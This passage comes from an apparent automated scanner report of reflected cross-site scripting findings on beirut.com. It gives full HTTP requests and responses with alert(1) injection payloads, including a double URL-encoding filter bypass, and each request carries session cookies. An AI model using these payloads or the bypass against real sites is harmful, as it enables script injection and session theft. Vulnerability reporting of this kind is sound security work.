Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:56:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Stores-Markets/3546182765b3352'-alert(1)-'1987268ce2a/Supermarket/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1085. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70285'-alert(1)-'154c5bfcafe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Stores-Markets/3546182765/Supermarket70285'-alert(1)-'154c5bfcafe/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:59:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Stores-Markets/3546182765/Supermarket70285'-alert(1)-'154c5bfcafe/63';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1086. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ca1"><a>d32881060f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping53ca1"><a>d32881060f0/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping53ca1"><a>d32881060f0">
...[SNIP]...

4.1087. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97253'-alert(1)-'94cd40893b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping97253'-alert(1)-'94cd40893b6/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:04:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping97253'-alert(1)-'94cd40893b6/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1088. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3b14%2527%253balert%25281%2529%252f%252ff3f450929b9 was submitted in the REST URL parameter 4. This input was echoed as d3b14';alert(1)//f3f450929b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097d3b14%2527%253balert%25281%2529%252f%252ff3f450929b9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:42:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='6097d3b14';alert(1)//f3f450929b9';
var showfacebox='';
</script>
...[SNIP]...

4.1089. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ab4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61ed4218169 was submitted in the REST URL parameter 4. This input was echoed as 45ab4"><script>alert(1)</script>61ed4218169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/609745ab4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61ed4218169 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=609745ab4"><script>alert(1)</script>61ed4218169&randstyle=purple">
...[SNIP]...

4.1090. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7c0f%2527%253balert%25281%2529%252f%252f2b97de70f11 was submitted in the REST URL parameter 4. This input was echoed as c7c0f';alert(1)//2b97de70f11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Clemenceau/Fluks/5938c7c0f%2527%253balert%25281%2529%252f%252f2b97de70f11 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='5938c7c0f';alert(1)//2b97de70f11';
var showfacebox='';
</script>
...[SNIP]...

4.1091. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b86132d791 was submitted in the REST URL parameter 4. This input was echoed as 872f3"><script>alert(1)</script>5b86132d791 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Clemenceau/Fluks/5938872f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b86132d791 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:27:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=5938872f3"><script>alert(1)</script>5b86132d791&randstyle=green">
...[SNIP]...

4.1092. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61e41%2527%253balert%25281%2529%252f%252fa52dc1a1c5b was submitted in the REST URL parameter 4. This input was echoed as 61e41';alert(1)//a52dc1a1c5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/591061e41%2527%253balert%25281%2529%252f%252fa52dc1a1c5b HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:39:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='591061e41';alert(1)//a52dc1a1c5b';
var showfacebox='';
</script>
...[SNIP]...

4.1093. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f283%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c15393c0d0 was submitted in the REST URL parameter 4. This input was echoed as 5f283"><script>alert(1)</script>3c15393c0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/59105f283%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c15393c0d0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:38:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=59105f283"><script>alert(1)</script>3c15393c0d0&randstyle=blue">
...[SNIP]...

4.1094. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9cdf"><a>92e5fcb6396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDod9cdf"><a>92e5fcb6396/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:46:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDod9cdf"><a>92e5fcb6396/Exhibitions&listingtype=events.php&Types=">
...[SNIP]...

4.1095. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1975'-alert(1)-'b7645df14c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDoa1975'-alert(1)-'b7645df14c6/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDoa1975'-alert(1)-'b7645df14c6/Exhibitions';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1096. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e1d9'-alert(1)-'c8b1e6c1dea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Exhibitions7e1d9'-alert(1)-'c8b1e6c1dea/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:07:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
